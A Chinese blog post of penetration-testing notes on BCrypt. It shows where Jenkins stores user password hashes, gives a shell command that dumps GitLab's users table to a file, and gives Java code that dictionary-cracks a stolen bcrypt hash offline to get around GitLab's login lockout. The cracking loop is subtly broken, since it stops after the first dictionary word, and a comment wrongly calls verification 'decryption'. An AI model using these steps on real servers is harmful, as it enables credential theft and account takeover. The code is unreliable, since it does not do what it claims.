java bcrypt加密算法_【渗透笔记】BCrypt实战两则

最新推荐文章于 2024-05-07 14:20:57 发布
最新推荐文章于 2024-05-07 14:20:57 发布
阅读量565 收藏
点赞数
文章标签: java bcrypt加密算法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39640646/article/details/114999124
版权

Jenkins 用户密码加密

$JENKINS_HOME/users/users.xml

admin

admin_6666666666666666

$JENKINS_HOME/admin_6666666666666666/config.xml

passwordHash 节点可以看到用户密码加密后的密文哈希值:

#jbcrypt:$2a$10$3fcowsyU5CsgeUywbAjZkuXlN4NVdfLu9bYxNx5RvJ9.9CyOzatDu

其加密采用jbcrypt完成,jbcrypt 是 bcrypt 加密工具的 java 实现。

package com.test.jenkins;

import org.mindrot.jbcrypt.BCrypt;

public class Jenkins {

public static void main(String[] args)

{

//加密

String hashed = BCrypt.hashpw("123456", BCrypt.gensalt());

System.out.println(hashed);

//解密

if (BCrypt.checkpw("111111", hashed))

System.out.println("密码正确");

else

System.out.println("密码错误");

}

}

org.mindrot

jbcrypt

0.4

用 jbcrypt 对同一个明文加密后因为 salt 一般不同,加密后的密文一般不同,且bcrypt 是不可逆的加密算法,无法通过解密密文得到明文。

bcrypt 和其他对称或非对称加密方式不同的是,不是直接解密得到明文,也不是二次加密比较密文,而是把明文和存储的密文一块运算得到另一个密文,如果这两个密文相同则验证成功。

Gitlab 用户密码解密

在《Gitlab 本地db_dump》章节我们已经提到过如何快速脱裤了:

sudo -i -u gitlab-psql bash -c "echo 'select * from users;' |psql -h /var/opt/gitlab/postgresql -d gitlabhq_production > /tmp/user_dump.txt"

Gitlab用户加密同样采用了BCrypt作为加密策略,BCrypt虽然无法逆向解密,但我们依然可以按照它的密码验证逻辑来进行本地字典爆破,Gitlab前端存在一个密码错误十次账户锁定的防爆破机制。

package com.test.gitlab;

import org.mindrot.jbcrypt.BCrypt;

import java.io.IOException;

import java.nio.file.Files;

import java.nio.file.Paths;

import java.util.ArrayList;

import java.util.List;

public class Gitlab {

public static void main(String[] args) {

//密文

String hashed = "$2a$10$3fcowsyU5CsgeUywbAjZkuXlN4NVdfLu9bYxNx5RvJ9.9CyOzatDu";

//字典

List pass = readTxt("src/main/java/com/test/gitlab/100.txt");

assert pass != null;

for (Object o : pass) {

if (BCrypt.checkpw((String) o, hashed))

System.out.println("爆破成功,密码为:" + o);

break;

}

}

//读取TXT返回列表形式

public static List readTxt(String filePath) {

List fileList = new ArrayList<>();

try {

fileList = Files.readAllLines(Paths.get(filePath));

} catch (IOException e) {

e.printStackTrace();

}

return fileList;

}

}

weixin_39640646
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java实现BCrypt加密
不再更新,新博客 chgl16.space
12-25 3904
描述 BCrypt是比较流行的加密算法,相比MD5。BCrypt还是多对多,在数据库存加密数据方面很实用。Spring Security里面集成了BCrypt的算法,但是普通项目可以用一个第三方开发的工具栏,这里粗略介绍这个工具类。 使用 下载 =&gt;下载该工具类 加密 &amp; 验证 // Hash a password for the first time String hashed...
Java实现密码加密实现步骤【bcrypt算法】
weixin_52721608的博客
08-26 1622
SpringBoot和SSM框架均可实现密码加密的方法
Java通过BCrypt加密过程详解
08-25
主要介绍了Java通过BCrypt加密过程详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
bcrypt加密
最新发布
m0_73505556的博客
05-07 99
bcrypt加密
Jenkins进阶系列之——11修改Jenkins用户的密码
小明的博客
05-10 278
 说明:本方法仅适用于jdk6+、tomcat6+和Jenkins专有用户数据库的Jenkins! 很多童鞋在使用jenkins的时候忘记密码了,然后各种蛋疼。最近闲着无事,折腾了下。好了,闲话少扯。 Jenkins专有用户的数据存放在JENKINS_HOME/users目录。users目录的结构我就不扯了,你一看就懂。users/xxx(各种用户名)
JavaEE:使用BCrypt加密算法验证登录密码
a526001650a的专栏
07-15 677
SpringBoot配置:https://blog.csdn.net/a526001650a/article/details/106687559 1.导入SpringSecurity依赖: <!-- 导入SrpingSecurity依赖 --> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-sec...
Java语言BCrypt加密
04-25
Java写的BCrypt加密,很值得学习!看看就知道了
Bcrypt加密相关jar包
09-08
Bcrypt加密类相关jar包
BCryptUtils.rar_BCrypt_bcriptUtils_harborcqi_northy2h_one7k5
09-15
对用户输入的密码进行md5加密,然后在md5基础上进行BCript加密
基于加盐BCrypt算法的电商安全模块设计及实现
05-06
本文运用springmvc+spring+mybatis框架技术,通过模型分析、数据库表设计、时序图逻辑跳转的方式,详细地阐述了加盐BCrypt算法在电商安全模块中的应用,有效地解决了MD5加密算法的弊端,极大地提高了信息的安全性.
javaBCryptPasswordEncoder 密码的加密与验证(简单使用)
DAMO小天天
03-03 6904
import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder; public class Test{ public static void main(String[] args) { BCryptPasswordEncoder bcp = new BCryptPasswordEncoder...
Java通过BCrypt加密
just
11-02 3834
说明: BCrypt读法:[bkrɪpt] BCrypt工具:http://www.mindrot.org/projects/jBCrypt/#download BCrypt是比较流行的加密算法,相比MD5。BCrypt还是比较多,在数据库存加密数据方面很实用。Spring Security里面集成了BCrypt的算法,但是普通项目可以下载BCypt的库,其实也就一个.java文件,把他放到项...
动态加密解密
weixin_46150371的博客
09-23 724
字符串加密 一、BCryptPasswordEncoder包 import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import java.security.SecureRandom; import java.util.regex.Pattern; public class BCryptPasswordEncoder { private final Log logger = LogF
Jenkins忘记账号密码
wuyepiaoxue789的博客
10-25 9191
方法一(已用过) 修改 JENKINS_HOME/users/user.conf user.conf 就是忘记密码对应的用户 针对 yum install jenkins 安装的Jenkins,它的HOME目录位于 /var/lib/jenkins/ 下面如我的 修改config.xml,找到 passwordHash部分,替换原有的hash值原始文件: 修改 #jbcrypt:$2
JBCrypt 一个简便的密码验证方案
qianjingfan的专栏
03-01 707
JBCrypt 一个简便的密码验证方案
java b无效_BCrypt.checkpw()盐无效版本异常
weixin_30533301的博客
03-02 766
我试图在我的Play 2.1中使用BCrypt实现身份验证。 Java应用程序,但我在尝试验证用户时收到Invalid salt version exception。BCrypt.checkpw()盐无效版本异常这是我的堆栈跟踪play.api.Application$$anon$1: Execution exception[[IllegalArgumentException: Invalid s...
Bcrypt+AES】 Vue+Java前后端分离信息加解密详解和问题解决
热门推荐
NineWaited的博客
03-12 1万+
Vue+SpringBoot实现 登录信息Bcrypt加密+后端匹配 与注册信息AES加密+后端解密。
bcrypt加密算法
08-09
Bcrypt是一种跨平台的文件加密工具,它使用了布鲁斯·施内尔在1993年发布的Blowfish加密算法。使用Bcrypt加密的文件可以在所有支持的操作系统和处理器上进行转移。Bcrypt的口令必须是8至56个字符,并在内部转换为448...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值